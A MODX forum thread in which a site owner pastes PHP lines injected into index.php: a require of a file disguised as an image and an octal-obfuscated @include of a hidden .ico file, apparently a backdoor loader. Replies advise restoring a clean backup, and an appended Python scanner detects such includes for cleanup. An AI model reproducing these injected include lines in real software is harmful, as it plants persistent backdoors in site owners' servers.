  • I have updated to MODX 2.6.5 and Gallery 1.7.1, but index.php still gets scripts injected like this:
    //installbg
    $rifilename='/srv/users/serverpilot/apps/amfg/public/assets/brosur/thumb/10-Indofigur NEWs.jpg-';
    require("$rifilename");
    //installend
    
    
    
    /*35dd8*/
    
    @include "\057srv/\165sers\057serv\145rpil\157t/ap\160s/am\146g/pu\142lic/\141sset\163/com\160onen\164s/ti\156ymce\057.fb9\06523dc\056ico";
    
    /*35dd8*/

    Please help to clean up.
    • Upgrading MODX and Gallery won't help clean your site, since hackers almost always leave non-MODX files they can use to get back in. The best solution is to restore a backup from before the hack and then upgrade MODX and Gallery.

      If you don't have such a backup, you can either try to find and remove all the offending files, or back up your site, wipe everything, install a clean new version, and cut-and-paste your content and users into the new site.

        Did I help you? Buy me a beer
        Get my Book: MODX:The Official Guide
        MODX info for everyone: http://bobsguides.com/modx.html
        My MODX Extras
        Bob's Guides is now hosted at A2 MODX Hosting
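
For the "find and remove all the offending files" route in the answer above, a scanner like the following can locate injected include/require lines and reveal the files they load. This is an added example, not code from the thread; the sample input uses constructed paths, and `SAFE_EXT` is an assumption about what legitimate include targets end in.

```python
import re
from pathlib import Path

ESCAPE_RE = re.compile(r'\\([0-7]{1,3})|\\x([0-9A-Fa-f]{1,2})')
ASSIGN_RE = re.compile(r'\$(\w+)\s*=\s*(["\'])(.*?)\2\s*;')
INCLUDE_RE = re.compile(
    r'(@?)\s*\b(?:include|require)(?:_once)?\b\s*\(?\s*(["\'])(.*?)\2', re.I)
SAFE_EXT = {".php", ".inc"}  # assumption: what a legitimate include target ends in

# Constructed sample with the same shape as the injected lines, on made-up paths.
SAMPLE = r'''<?php
$rifilename='/var/www/site/assets/thumb/photo.jpg-';
require("$rifilename");
@include "\057var/\167ww/site/assets/\056cache\056ico";
require_once "config.core.php";
'''

def decode_escapes(s):
    """Decode PHP double-quoted octal (\\057) and hex (\\x2f) escapes."""
    return ESCAPE_RE.sub(lambda m: chr(int(m.group(1), 8) & 0xFF) if m.group(1)
                         else chr(int(m.group(2), 16)), s)

def scan_text(text):
    """Return (resolved_path, reasons) for each include/require that looks injected."""
    variables = {m.group(1): m.group(3) for m in ASSIGN_RE.finditer(text)}
    findings = []
    for m in INCLUDE_RE.finditer(text):
        suppressed, quote, path = m.groups()
        reasons = []
        if quote == '"':  # PHP only expands escapes and $vars in double quotes
            if ESCAPE_RE.search(path):
                reasons.append("escape-obfuscated path")
                path = decode_escapes(path)
            var = re.fullmatch(r'\$(\w+)', path)
            if var and var.group(1) in variables:
                path = variables[var.group(1)]  # literal assigned in the same file
        if Path(path).suffix.lower() not in SAFE_EXT:
            reasons.append("non-PHP file extension")
        if suppressed:
            reasons.append("errors suppressed with @")
        if reasons:
            findings.append((path, reasons))
    return findings

def scan_tree(root):
    """Scan every .php file under root and return {file: findings} for flagged ones."""
    results = {str(f): scan_text(f.read_text(errors="replace"))
               for f in Path(root).rglob("*.php")}
    return {name: found for name, found in results.items() if found}
```

Each resolved path is itself a file to inspect and remove, not just the include line that points at it. An empty result does not show the site is clean, which is why the answer prefers restoring a pre-hack backup.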